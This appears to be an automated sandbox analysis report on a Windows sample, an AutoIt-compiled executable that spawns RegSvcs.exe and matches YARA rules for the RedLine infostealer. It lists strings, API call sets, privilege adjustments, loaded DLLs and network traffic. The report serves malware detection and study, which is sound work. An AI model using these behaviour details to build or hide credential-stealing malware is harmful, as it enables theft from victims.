              Source: aYf5ibGObB.exe, 00000000.00000000.2033040209.0000000001092000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7f470b34-3
              Source: aYf5ibGObB.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b948215a-8
              Source: aYf5ibGObB.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cc446b16-0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0103D5EB
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01031201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01031201
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0103E8F6
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD80600_2_00FD8060
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010420460_2_01042046
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010382980_2_01038298
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0100E4FF0_2_0100E4FF
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0100676B0_2_0100676B
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010648730_2_01064873
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FDCAF00_2_00FDCAF0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FFCAA00_2_00FFCAA0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FECC390_2_00FECC39
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01006DD90_2_01006DD9
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD91C00_2_00FD91C0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FEB1190_2_00FEB119
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF13940_2_00FF1394
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF17060_2_00FF1706
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF781B0_2_00FF781B
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF19B00_2_00FF19B0
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FE997D0_2_00FE997D
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD79200_2_00FD7920
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF7A4A0_2_00FF7A4A
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF7CA70_2_00FF7CA7
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF1C770_2_00FF1C77
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0105BE440_2_0105BE44
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF1F320_2_00FF1F32
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01009EEE0_2_01009EEE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00D3C7C00_2_00D3C7C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CAE7B02_2_00CAE7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CADC902_2_00CADC90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D744682_2_05D74468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D796282_2_05D79628
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D733202_2_05D73320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D7DD002_2_05D7DD00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D7D1082_2_05D7D108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05D712102_2_05D71210
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: String function: 00FF0A30 appears 46 times
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: String function: 00FD9CB3 appears 31 times
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: String function: 00FEF9F2 appears 40 times
              Source: aYf5ibGObB.exe, 00000000.00000003.2053227822.0000000003713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aYf5ibGObB.exe
              Source: aYf5ibGObB.exe, 00000000.00000003.2051385536.00000000038BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aYf5ibGObB.exe
              Source: aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs aYf5ibGObB.exe
              Source: aYf5ibGObB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: aYf5ibGObB.exe PID: 2104, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 3596, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@1/1
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010437B5 GetLastError,FormatMessageW,0_2_010437B5
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010310BF AdjustTokenPrivileges,CloseHandle,0_2_010310BF
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_010316C3
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_010451CD
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0105A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0105A67C
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0104648E
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FD42A2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeFile created: C:\Users\user\AppData\Local\Temp\autFE0E.tmpJump to behavior
              Source: aYf5ibGObB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aYf5ibGObB.exeReversingLabs: Detection: 78%
              Source: unknownProcess created: C:\Users\user\Desktop\aYf5ibGObB.exe "C:\Users\user\Desktop\aYf5ibGObB.exe"
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\aYf5ibGObB.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\aYf5ibGObB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeSection loaded: wldp.dllJump to behavior
              Source: aYf5ibGObB.exeStatic file information: File size 1058816 > 1048576
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: aYf5ibGObB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wntdll.pdbUGP source: aYf5ibGObB.exe, 00000000.00000003.2059872587.0000000003610000.00000004.00001000.00020000.00000000.sdmp, aYf5ibGObB.exe, 00000000.00000003.2050970526.0000000003790000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aYf5ibGObB.exe, 00000000.00000003.2059872587.0000000003610000.00000004.00001000.00020000.00000000.sdmp, aYf5ibGObB.exe, 00000000.00000003.2050970526.0000000003790000.00000004.00001000.00020000.00000000.sdmp
              Source: aYf5ibGObB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: aYf5ibGObB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: aYf5ibGObB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: aYf5ibGObB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: aYf5ibGObB.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FD42DE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FF0A76 push ecx; ret 0_2_00FF0A89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CA1861 push cs; retf 2_2_00CA1866
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00CA1867 push cs; retf 2_2_00CA186A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05DC0E22 push FFFFFFB7h; iretd 2_2_05DC0E24

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55615
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55615
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_00FEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FEF98E
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01061C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01061C41
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
